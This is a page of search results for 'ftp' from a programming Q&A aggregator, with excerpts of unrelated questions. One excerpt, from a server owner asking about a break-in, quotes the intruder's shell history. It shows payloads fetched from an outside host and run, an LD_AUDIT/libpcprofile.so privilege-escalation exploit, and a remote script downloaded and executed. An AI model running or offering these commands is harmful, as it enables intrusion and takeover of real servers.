Search Results

Search found 2798 results on 112 pages for 'ftp'.

Page 103/112 | < Previous Page | 99 100 101 102 103 104 105 106 107 108 109 110  | Next Page >

  • Strange Sql Server 2005 behavior

    - by Justin C
    Background: I have a site built in ASP.NET with Sql Server 2005 as it's database. The site is the only site on a Windows Server 2003 box sitting in my clients server room. The client is a local school district, so for data security reasons there is no remote desktop access and no remote Sql Server connection, so if I have to service the database I have to be at the terminal. I do have FTP access to update ASP code. Problem: I was contacted yesterday about an issue with the system. When I looked in to it, it seems a bug that I had solved nearly a year ago had returned. I have a stored procedure that used to take an int as a parameter but a year ago we changed the structure of the system and updated the stored procedure to take an nvarchar(10). The stored procedure somehow changed back to taking an int instead of an nvarchar. There is an external hard drive connected to the server that copies data periodically and has the ability to restore the server in case of failure. I would have assumed that somehow an older version of the database had been restored, but data that I know was inserted 7 days and 1 day before the bug occurred is still in the database. Question: Is there anyway that the structure of a Sql Server 2005 database can revert to a previous version or be restored to a previous version without touching the actual data? No one else should have access to the server so I'm going a little insane trying to figure out how this even happened. Any ideas?

    Read the article

  • Why can't I simply copy installed Perl modules to other machines?

    - by pistacchio
    Being very new to Perl but not to dynamic languages, I'm a bit surprised at how not straight forward the manage of modules is. Sure, cpan X does theoretically work, but I'm working on the same project from three different machines and OSs (at work, at home, testing in an external environment). At work (Windows 7) I have problem using cpan because of our firewall that makes ftp unusable At home (Mac OS X) it does work In the external environment (Linux CentOs) it worked after hours because I don't have root access and I had to configure cpan to operate as a non-root user I've tried on another server where I have an access. If the previous external environment is a VPS and so I have a shell access, this other one is a cheap shared hosting where I have no way to install new modules other than the ones pre-installed At the moment I still can't install Template under Windows. I've seen that as an alternative I could compile it and I've also tried ActiveState's PPM but the module is not existent there. Now, my perplexity is about Perl being a dynamic language. I've had all these kind of problems while working, for example, with C where I had to compile all the libraries for all the platform, but I thought that with Perl the approach would have been very similar to Python's or PHP's where in 90% of the cases copying the module in a directory and importing it simply works. So, my question: if Perl's modules are written in Perl, why the copy/paste approach will not work? If some (or some part) of the modules have to be compiled, how to see in CPAN if a module is Perl-only or it relies upon compiled libraries? Isn't there a way to download the module (tar, zip...) and use cpan to deploy it? This would solve my problem under Windows.

    Read the article

  • Editing a remote file on-the-fly with PHP

    - by user275074
    Hi, I have a requirement to edit a remote text file on-the-fly, the content of which currently stands at ~1Mb. I have tried a couple of approaches and both seem to be clunky or hog memory which I can't rely on. Thinking out logically what I'm trying to achieve is: FTP to a remote server. Download a copy of the file for backup purposes and store it somewhere locally. Open the remote file and add the necessary lines required. Remove lines from the remote file as per an array of un-required data generated from the local server. Is this possible? I've managed to code steps 1 and 2 but I'm having difficult with 3 and 4. The way I'm doing it now is to use fgets and return the whole string. Really, I don't want to do this as it involves manipulating and re-generating the whole string (and it's large) and then re-inserting it in between two markers in the remote file. Is there no way of manipulating the lines of text in the file on-the-fly?

    Read the article

  • Ubuntu Server hack [closed]

    - by haxpanel
    Hi! I looked at netstat and I noticed that someone besides me is connected to the server by ssh. I looked after this because my user has the only one ssh access. I found this in an ftp user .bash_history file: w uname -a ls -a sudo su wget qiss.ucoz.de/2010/.jpg wget qiss.ucoz.de/2010.jpg tar xzvf 2010.jpg rm -rf 2010.jpg cd 2010/ ls -a ./2010 ./2010x64 ./2.6.31 uname -a ls -a ./2.6.37-rc2 python rh2010.py cd .. ls -a rm -rf 2010/ ls -a wget qiss.ucoz.de/ubuntu2010_2.jpg tar xzvf ubuntu2010_2.jpg rm -rf ubuntu2010_2.jpg ./ubuntu2010-2 ./ubuntu2010-2 ./ubuntu2010-2 cat /etc/issue umask 0 dpkg -S /lib/libpcprofile.so ls -l /lib/libpcprofile.so LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping ping gcc touch a.sh nano a.sh vi a.sh vim wget qiss.ucoz.de/ubuntu10.sh sh ubuntu10.sh nano ubuntu10.sh ls -a rm -rf ubuntu10.sh . .. a.sh .cache ubuntu10.sh ubuntu2010-2 ls -a wget qiss.ucoz.de/ubuntu10.sh sh ubuntu10.sh ls -a rm -rf ubuntu10.sh wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe rm -rf W2Ksp3.exe passwd The system is in a jail. Does it matter in the current case? What shall i do? Thanks for everyone!! I have done these: - ban the connected ssh host with iptables - stoped the sshd in the jail - saved: bach_history, syslog, dmesg, files in the bash_history's wget lines

    Read the article

  • An online php debugger/code editor

    - by Zirak
    It's a simple deal: I'm sometimes in places where I don't have my laptop, and find myself with spare time and an idea for a project. But unfortunately, I can't do anything about it. I tried a variety of solutions, which include running IDEs (like phpstorm or Aptana) on a disc-on-key or cd (very slow and unappealing), trying several online solutions (like http://phpanywhere.net) and found that all of them are either buggy, overloaded or underloaded with features, just difficult to use, require FTP etc etc. All that is required here is a syntax highlighting and debugging alerts; no actual running of code. So the question is split into two: 1)Do you know of a good online php editor that you've used and enjoyed? 2)If no, then how would you go about making one? The second one seems a bit general, so I'll try and expand...It might be a good idea; if you can't find one, make one. The question is about the concept of making a syntax highlighter (shouldn't be too difficult), and the difficult part of catching php errors WITHOUT executing any php code. Thank you in advance.

    Read the article

  • link clickable and wordwrap

    - by newinjs
    hi, i'm using php wordwrap for my comment box. This is my clickable function, function clickable_link($text) { $ret = ' ' . $text; $ret = preg_replace("#(^|[\n ])([\w]+?://[\w\#$%&~/.\-;:=,?@\[\]+]*)#is", "\\1<a class=\"hrefLink\" href=\"\\2\" target=\"_blank\">\\2</a>", $ret); $ret = preg_replace("#(^|[\n ])((www|ftp)\.[\w\#$%&~/.\-;:=,?@\[\]+]*)#is", "\\1<a class=\"hrefLink\" href=\"http://\\2\" target=\"_blank\">\\2</a>", $ret); $ret = preg_replace("#(^|[\n ])([a-z0-9&\-_.]+?)@([\w\-]+\.([\w\-\.]+\.)*[\w]+)#i", "\\1<a href=\"mailto:\\2@\\3\">\\2@\\3</a>", $ret); $ret = substr($ret, 1); return $ret; } and this is my wordwrap for comment $comment = clickable_link($comment); $comment = wordwrap($comment, 25, "\n", false); so, once the word limit for 25 is reached, my comment box break my link http://www.websitetitle.com/showthread.php?t=2000 link become like this http://www.websitetitle.com/showthread.php? <br> t=2000 The link is broken. so is it possible to fix the link or any other workaround? Thank you

    Read the article

  • What database strategy to choose for a large web application

    - by Snoopy
    I have to rewrite a large database application, running on 32 servers. The hardware is up to date, each machine has two quad core Xeon and 32 GByte RAM. The database is multi-tenant, each customer has his own file, around 5 to 10 GByte each. I run around 50 databases on this hardware. The app is open to the web, so I have no control on the load. There are no really complex queries, so SQL is not required if there is a better solution. The databases get updated via FTP every day at midnight. The database is read-only. C# is my favourite language and I want to use ASP.NET MVC. I thought about the following options: Use two big SQL servers running SQL Server 2012 to serve the 32 servers with data. On the 32 servers running IIS hosting providing REST services. Denormalize the database and use Redis on each webserver. Use booksleeve as a Redis client. Use a combination of SQL Server and Redis Use SQL Server 2012 together with Hadoop Use Hadoop without SQL Server What is the best way for a read-only database, to get the best performance without loosing maintainability? Does Map-Reduce make sense at all in such a scenario? The reason for the rewrite is, the old app written in C++ with ISAM technology is too slow, the interfaces are old fashioned and not nice to use from an website, especially when using ajax. The app uses a relational datamodel with many tables, but it is possible to write one accerlerator table where all queries can be performed on, and all other information from the other tables are possible by a simple key lookup.

    Read the article

  • Export large amount of data from Oracle 10G to SQL Server 2005

    - by uniball
    Dear all, I need to export 100 million data rows (avg row length ~ 100 bytes) from Oracle 10G database table into SQL server (over WAN/VLAN with 6MBits/sec capacity) on a regular basis. So far, these are the options that I have tried and a quick summary. Has anyone tried this before? Are there other better options? Which option would be the best in terms of performance and reliability? The time taken has been calculated using tests on smaller amounts of data and then extrapolating it to estimate the time required. Using data import wizard on the SQL server or SSIS packages to import the data. It will take around 150 hours to complete the task. Using Oracle batch job to spool data into a comma-delimited flat-file. Then using SSIS package to FTP this file to the SQL server and then load directly from the flat-file. The issue here is the size of the flat-file which is expected to run in GBs. Although this option is drastically different, I am even considering the option of using Linked Server to query the Oracle data directly at run-time to avoid bringing in data. Performance is a big problem and I have limited control over the Oracle database in terms of creating table indexes. Regards, Uniball

    Read the article

  • Design an Application That Stores and Processes Files

    - by phasetwenty
    I'm tasked with writing an application that acts as a central storage point for files (usually document formats) as provided by other applications. It also needs to take commands like "file 395 needs a copy in X format", at which point some work is offloaded to a 3rd party application. I'm having trouble coming up with a strategy for this. I'd like to keep the design as simple as possible, so I'd like to avoid big extra frameworks or techniques like threads for as long as it makes sense. The clients are expected to be web applications (for example, one is a django application that receives files from our customers; the others are not yet implemented). The platform it will be running on is likely going to be Python on Linux, unless I have a strong argument to use something else. In the beginning I thought I could fit the information I wanted to communicate in the filenames, and let my application parse the filename to figure out what it needed to do, but this is proving too inflexible with the amount of information I'm realizing I need to make available. Another idea is to pair FTP with a database used as a communication medium (client uploads a file and updates the database with a command as a row in a table) but I don't like this idea because adding commands (a known change) looks like it will require adding code as well as changing database schemas. It will also muddy up the interface my clients will have to use. I looked into Pyro to let applications communicate more directly but I don't like the idea of running an extra nameserver for this one purpose. I also don't see a good way to do file transfer within this framework. What I'm looking for is techniques and/or technologies applicable to my problem. At the simplest level, I need the ability to accept files and messages with them.

    Read the article

  • Accents in uploaded file being replaced with '?'

    - by Katfish
    I am building a data import tool for the admin section of a website I am working on. The data is in both French and English, and contains many accented characters. Whenever I attempt to upload a file, parse the data, and store it in my MySQL database, the accents are replaced with '?'. I have text files containing data (charset is iso-8859-1) which I upload to my server using CodeIgniter's file upload library. I then read the file in PHP. My code is similar to this: $this->upload->do_upload() $data = array('upload_data' => $this->upload->data()); $fileHandle = fopen($data['upload_data']['full_path'], "r"); while (($line = fgets($fileHandle)) !== false) { echo $line; } This produces lines with accents replaced with '?'. Everything else is correct. If I download my uploaded file from my server over FTP, the charset is still iso-8850-1, but a diff reveals that the file has changed. However, if I open the file in TextEdit, it displays properly. I attempted to use PHP's stream_encoding method to explicitly set my file stream to iso-8859-1, but my build of PHP does not have the method. After running out of ideas, I tried wrapping my strings in both utf8_encode and utf8_decode. Neither worked. If anyone has any suggestions about things I could try, I would be extremely grateful.

    Read the article

  • implementing a Intelligent File Transfer Software in java over TCP/IP

    - by whyjava
    Hello I am working on a proposal where we have to implement a software which can move files between one source to destination.The overall goal of this project is to create intelligent file transfer.This software will have three components :- 1) Broker : Broker is the module that communicates with other brokers, monitors files, moves files, retrieves configurations from the Configuration Manager, supplies process information for the monitor, archives files, writes all process data to log files and escalates issues if necessary 2) Configuration Manager :Configuration Manager is a web-based application used to configure and deploy the configuration to all brokers. 3) Monitor : Monitor is a web-based application used to monitor each Broker in the environment. This project has to be built up in java and protocol for file transfer in tcp/ip. Client does not want to use FTP. File Transfer seems very easy, until there are several processes who are waiting to pick the file up automatically. Several problems arise: How can we guarantee the file is received at the destination? If a file isn’t received the first time, we should try it again (even after a restart or power breakdown) ? How does the receiver knows the file that is received is complete? How can we transfer multiple files synchronously? How can we protect the bandwidth, so file transfer isn’t blocking other processes? How does one interoperate between multiple OS platforms? What about authentication? How can we monitor het workflow? Auditing / logging Archiving Can you please provide answer to some of these? Thanks

    Read the article

  • Automated test, build and deploy

    - by mike79
    I have visual studio team suite 2008. I was unable to meet the requirements to setup TFS, so I'm using TortoiseSvn and VisualSvn as my version contol in VSTS. I need the system setup to do the following: I neeed to be able to create and track workitems. When updates are made to the current project worked on in VSTS, the updates will be commited back to version control. Tests will be run to see that updates don't break the application. If there's a problem with the update it will be reported back to the developer. If there's no problem with the app, which is a clickonce application, it will automatically be built and deployed to an ftp server. I've never worked with version control, build servers, automated testing and continous intergration. I need to know what needs to be put in place for this type of system. I don't know which combination/stack I should be using: CC.net, TeamCity, Hudson, NAnt, NUnit, MsTest, Trac, BugTracker.net, Ndepend, VisualSvn Server, Perforce, Msdeploy, SCM. I want something that is free/opensource and relatively easy to setup and use. Please suggest a setup that will fit my needs. Any help appreciated

    Read the article

  • Validating parameters according to a fixed reference

    - by James P.
    The following method is for setting the transfer type of an FTP connection. Basically, I'd like to validate the character input (see comments). Is this going overboard? Is there a more elegant approach? How do you approach parameter validation in general? Any comments are welcome. public void setTransferType(Character typeCharacter, Character optionalSecondCharacter) throws NumberFormatException, IOException { // http://www.nsftools.com/tips/RawFTP.htm#TYPE // Syntax: TYPE type-character [second-type-character] // // Sets the type of file to be transferred. type-character can be any // of: // // * A - ASCII text // * E - EBCDIC text // * I - image (binary data) // * L - local format // // For A and E, the second-type-character specifies how the text should // be interpreted. It can be: // // * N - Non-print (not destined for printing). This is the default if // second-type-character is omitted. // * T - Telnet format control (<CR>, <FF>, etc.) // * C - ASA Carriage Control // // For L, the second-type-character specifies the number of bits per // byte on the local system, and may not be omitted. final Set<Character> acceptedTypeCharacters = new HashSet<Character>(Arrays.asList( new Character[] {'A','E','I','L'} )); final Set<Character> acceptedOptionalSecondCharacters = new HashSet<Character>(Arrays.asList( new Character[] {'N','T','C'} )); if( acceptedTypeCharacters.contains(typeCharacter) ) { if( new Character('A').equals( typeCharacter ) || new Character('E').equals( typeCharacter ) ){ if( acceptedOptionalSecondCharacters.contains(optionalSecondCharacter) ) { executeCommand("TYPE " + typeCharacter + " " + optionalSecondCharacter ); } } else { executeCommand("TYPE " + typeCharacter ); } } }

    Read the article

  • Threadpool design question

    - by ZeroVector
    I have a design question. I want some feedback to know if a ThreadPool is appropriate for the client program I am writing. I am having a client running as a service processing database records. Each of these records contains connection information to external FTP sites [basically it is a queue of files to transfer]. A lot of them are to the same host, just moving different files. Therefore, I am grouping them together by host. I want to be able to create a new thread per host. I really don't care when the transfers finish, they just need to do all the work (or try to do) they were assigned, and then terminate once they are finished, cleaning up all resources they used in the process. I anticipate no more than 10-25 connections to be established. Once the transfer queue is empty, the program will simply wait until there are records in the queue again. Is the ThreadPool a good candidate for this or should I use a different approach? Edit: For the most part, this is the only significant custom application running on the server.

    Read the article

  • GPG error occurs while using "deb file:/local-path-to-repo ..." in /etc/apt/sources.list

    - by Chandler.Huang
    I need to install packages within non-internet connection environment. My plan is to download dist structure from Internet and then add file path to /etc/apt/sources.list. So I download related structure includes ubunt/dists/precise, precise-backports, precise-proposed, precise-security, precise-updates from a ftp mirror server. And then I remove original source and add the following to my /etc/apt/sources.list. deb file:path-to-local-ubuntu-directory/ precise main restricted multiverse universe deb-src file:path-to-local-ubuntu-directory/ precise main restricted multiverse universe Then I got GPG error as following after apt-get update. root@openstack:/~# apt-get update Ign file: precise InRelease Get:1 file: precise Release.gpg [198 B] Get:2 file: precise Release [50.1 kB] Ign file: precise Release Get:3 file: precise/main TranslationIndex [3,761 B] Get:4 file: precise/multiverse TranslationIndex [2,716 B] Get:5 file: precise/restricted TranslationIndex [2,636 B] Get:6 file: precise/universe TranslationIndex [2,965 B] Reading package lists... Done W: GPG error: file: precise Release: The following signatures were invalid: BADSIG 0976EAF437D05B5 Ubuntu Archive Automatic Signing Key <[email protected]> I had tried use the following steps after google but in vain. sudo apt-get clean cd /var/lib/apt sudo mv lists lists.old sudo mkdir -p lists/partial sudo apt-get update Is there any way to resolve this? And why this error occurs? Thanks a lot.

    Read the article

  • Exporting database from external server (without SSH access)

    - by Derek Carlisle
    Our current website is hosted by the design agency who originally built the website, however we are bringing the development of the website in house therefore need to export the database from their server and import it to ours. We have FTP and phpMyAdmin access but don't have SSH access to the server. I was hoping to run a PHP script that would mysql dump the database, compress it and then copy it across to our server using scp: $backupFile = $_SERVER['DOCUMENT_ROOT'].'/backup' . date("Y-m-d-H-i-s") . '.gz'; system("mysqldump -h DB_HOST -u DB_USER -pDB_PASS DB_NAME | gzip > $backupFile"); exec("sshpass -p PASSWORD scp -r -P PORT_NUMBER $backupFile [email protected]:/path/to/directory/"); I have ran this locally from the command line and it worked fine, although I had to install sshpass (the hosting server might not have this installed). Also, I was hoping to run it from the browser as I don't have command line access on the hosting server, however it didn't work, no errors produced though. Can you anyone recommend how I can export from the server that I don't have SSH access to and import to my server? Thanks

    Read the article

  • File IO with Streams - Best Memory Buffer Size

    - by AJ
    I am writing a small IO library to assist with a larger (hobby) project. A part of this library performs various functions on a file, which is read / written via the FileStream object. On each StreamReader.Read(...) pass, I fire off an event which will be used in the main app to display progress information. The processing that goes on in the loop is vaired, but is not too time consuming (it could just be a simple file copy, for example, or may involve encryption...). My main question is: What is the best memory buffer size to use? Thinking about physical disk layouts, I could pick 2k, which would cover a CD sector size and is a nice multiple of a 512 byte hard disk sector. Higher up the abstraction tree, you could go for a larger buffer which could read an entire FAT cluster at a time. I realise with today's PC's, I could go for a more memory hungry option (a couple of MiB, for example), but then I increase the time between UI updates and the user perceives a less responsive app. As an aside, I'm eventually hoping to provide a similar interface to files hosted on FTP / HTTP servers (over a local network / fastish DSL). What would be the best memory buffer size for those (again, a "best-case" tradeoff between perceived responsiveness vs. performance).

    Read the article

  • running php script manually and getting back to the command line?

    - by Simpson88Keys
    I'm running a php script via command line, and it works just fine, except that when it's finished, it doesn't go back to the command line? Just sits there, so I never when it's done... This is the script: $conn_id = ftp_connect(REMOTE) or die("Couldn't connect to ".REMOTE); $login_result = ftp_login($conn_id, 'OMITTED','OMITTED'); if ((!$conn_id) || (!$login_result)) die("FTP Connection Failed"); $dir = 'download'; if ($dir != ".") { if (ftp_chdir($conn_id, $dir) == false) { echo ("Change Dir Failed: $dir<BR>\r\n"); return; } if (!(is_dir($dir))) mkdir($dir); chdir ($dir); } $contents = ftp_nlist($conn_id, "."); foreach ($contents as $file) { if ($file == '.' || $file == '..') continue; if (@ftp_chdir($conn_id, $file)) { ftp_chdir ($conn_id, ".."); ftp_sync ($file); } else ftp_get($conn_id, $file, $file, FTP_BINARY); } ftp_chdir ($conn_id, ".."); chdir (".."); ftp_close($conn_id);

    Read the article

  • Newbie - eclipse workflow (PHP development)

    - by engil
    Hi all - this is a bit of a newbie question but hoping I can get some guidance. I've been playing around with Eclipse for a couple months yet I'm still not completely comfortable with my setup and it seems like every time I install it to a new system I end up with different results. What I'm hoping to achieve is (I think) fairly standard. In my environment I'd like SVN (currently using Subclipse), FTP support (currently using Aptana plugin), debugging (going to use XDebug) and all the usual bells and whistles of development (code completion, refactoring, etc.) My biggest current issue is how to set up my environment to support both a 'development' and 'production' server. Optimally I would be able to work directly against the dev server (Eclipse on my Vista desktop against the VM Ubuntu dev server) and then push to production server (shared hosting). I'd prefer to work directly against the dev server (with no local project files, just using the Connections provided by Aptana) but I'm guessing this won't allow for code-completoin or all the other bells and whistles provided for development. Any thoughts? Kind of an open ended question, but maybe this could be an opportunity for some of you with a great deal of experience using Eclipse to describe your setups so people like me can get some insight into good ways to get set up.

    Read the article

  • perl system command return code

    - by Mel
    I have a script that has been running for over a year and now it is failing: It is creating a command file: open ( FTPFILE, ">get_list"); print FTPFILE "dir *.txt"\n"; print FTPFILE "quit\n"; close FTPFILE; Then I run the system command: $command = "ftp ".$Server." < get_list | grep \"\^-\" >new_list"; $code = system($command); The logic the checks: if ($code == 0) { do stuff } else { log error } It is logging an error. When I print the $code variable, I am getting 256. I used this command to parse the $? variable: $exit_value = $? >> 8; $signal_num = $? & 127; $dumped_core = $? & 128; print "Exit: $exit_value Sig: $signal_num Core: $dumped_core\n"; Results: Exit: 1 Sig: 0 Core: 0 Thanks for any help/insight.

    Read the article

  • Jquery failure after site went live

    - by Brandon Condrey
    I have been designing a site for weeks using JQuery. I don't have a local server or a testing server so I just created a directory through FTP, '/testing'. Everything was working great in the testing directory. I attempted to go live tonight by moving all the files in '/testing' to the root directory and I changed all file paths and script sources accordingly. The site loads, but everything related to JQuery is non-functional. Javascript console gives errors of (just as an example from a plugin): '$.os.name' is not a function I'm at loss for what to do. I changed the paths referencing the JQuery library, installed a fresh copy of JQuery (to a new directory), etc. There is a wordpress installation in a different directory '/blog'. I've read about some compatibility issues with wordpress, but that seems to be related to using JQuery inside wordpress, which I am not. I'm not sure if any code would be beneficial since it was all functional in a different directory. Your help is greatly appreciated.

    Read the article

  • AppleScript: open frontmost file with another application

    - by jacobianism
    I'd like to write an AppleScript program to do the following (Automator would be fine too): I want to open the current active TextMate file (possibly there are several tabs open and other windows) with the application Transmit 2. (This will upload the file over FTP using Transmit's DockSend feature.) Here I've used a specific application (TextMate) but ideally I'd like it to work for any file currently active in any application. Ultimately I will assign a keyboard shortcut to run it. Here's what I have so far: tell application (path to frontmost application as text) set p to path of document 1 end tell tell application "Finder" open POSIX file p using "Transmit 2" end tell I've tried many variants of this and nothing works. EDIT: I have found this page: http://wiki.macromates.com/Main/Howtos and someone has made exactly the script I'm looking for: tell application "Transmit" to open POSIX file "$TM_FILEPATH" This is for Transmit [not 2] and I think for TextMate pre v2. I get the error (when using Transmit 2): Transmit 2 got an error: AppleEvent handler failed. One of the updates to v2 has broken it (not sure which one).

    Read the article

  • actionscript find and convert text to url

    - by gravesit
    I have this script that grabs a twitter feed and displays in a little widget. What I want to do is look at the text for a url and convert that url to a link. public class Main extends MovieClip { private var twitterXML:XML; // This holds the xml data public function Main() { // This is Untold Entertainment's Twitter id. Did you grab yours? var myTwitterID= "username"; // Fire the loadTwitterXML method, passing it the url to your Twitter info: loadTwitterXML("http://twitter.com/statuses/user_timeline/" + myTwitterID + ".xml"); } private function loadTwitterXML(URL:String):void { var urlLoader:URLLoader = new URLLoader(); // When all the junk has been pulled in from the url, we'll fire finishedLoadingXML: urlLoader.addEventListener(Event.COMPLETE, finishLoadingXML); urlLoader.load(new URLRequest(URL)); } private function finishLoadingXML(e:Event = null):void { // All the junk has been pulled in from the xml! Hooray! // Remove the eventListener as a bit of housecleaning: e.target.removeEventListener(Event.COMPLETE, finishLoadingXML); // Populate the xml object with the xml data: twitterXML = new XML(e.target.data); showTwitterStatus(); } private function addTextToField(text:String,field:TextField):void{ /*Regular expressions for replacement, g: replace all, i: no lower/upper case difference Finds all strings starting with "http://", followed by any number of characters niether space nor new line.*/ var reg:RegExp=/(\b(https?|ftp|file):\/\/[-A-Z0-9+&@#\/%?=~_|!:,.;]*[-A-Z0-9+&@#\/%=~_|])/ig; //Replaces Note: "$&" stands for the replaced string. text.replace(reg,"<a href=\"$&\">$&</a>"); field.htmlText=text; } private function showTwitterStatus():void { // Uncomment this line if you want to see all the fun stuff Twitter sends you: //trace(twitterXML); // Prep the text field to hold our latest Twitter update: twitter_txt.wordWrap = true; twitter_txt.autoSize = TextFieldAutoSize.LEFT; // Populate the text field with the first element in the status.text nodes: addTextToField(twitterXML.status.text[0], twitter_txt); }

    Read the article

  • How to current snapshot of MySQL Table and store it into CSV file(after creating it) ?

    - by Rachel
    I have large database table, approximately 5GB, now I wan to getCurrentSnapshot of Database using "Select * from MyTableName", am using PDO in PHP to interact with Database. So preparing a query and then executing it // Execute the prepared query $result->execute(); $resultCollection = $result->fetchAll(PDO::FETCH_ASSOC); is not an efficient way as lots of memory is being user for storing into the associative array data which is approximately, 5GB. My final goal is to collect data returned by Select query into an CSV file and put CSV file at an FTP Location from where Client can get it. Other Option I thought was to do: SELECT * INTO OUTFILE "c:/mydata.csv" FIELDS TERMINATED BY ',' OPTIONALLY ENCLOSED BY '"' LINES TERMINATED BY "\n" FROM my_table; But I am not sure if this would work as I have cron that initiates the complete process and we do not have an csv file, so basically for this approach, PHP Scripts will have to create an CSV file. Do a Select query on the database. Store the select query result into the CSV file. What would be the best or efficient way to do this kind of task ? Any Suggestions !!!

    Read the article

  • how to fetch data using jquery

    - by user3566029
    I have tried to connect my index.php file in 000webhost.com using jQuery. From the site menu I have connected with 000webhost using FTP details available in 000webhost.com. When I tried to read data from jQuery it doesn’t working. Anyone please tell me what should I need to change? Should I need to connect my Dreamweaver database to webhost? If yes please explain? This is what I have done. index.php $mysql_host = "mysql0.000webhost.com"; $mysql_database = "a000000_mydb"; $mysql_user = "a000000_root"; $mysql_password = "******"; $conn=@mysql_connect ( $mysql_host,$mysql_user,$mysql_password )or die('aa'); mysql_select_db($mysql_database,$conn) or die('eoor on db'); $quer=mysql_query("SELECT * FROM sam"); $res=array(); while($row=mysql_fetch_row($quer)) { $res[]=$row; } print(json_encode($res)); return json_encode($res); mysql_close(); index.html $.get('public_html/index.php', function( data ) { alert( 'Successful' +data); });

    Read the article

< Previous Page | 99 100 101 102 103 104 105 106 107 108 109 110  | Next Page >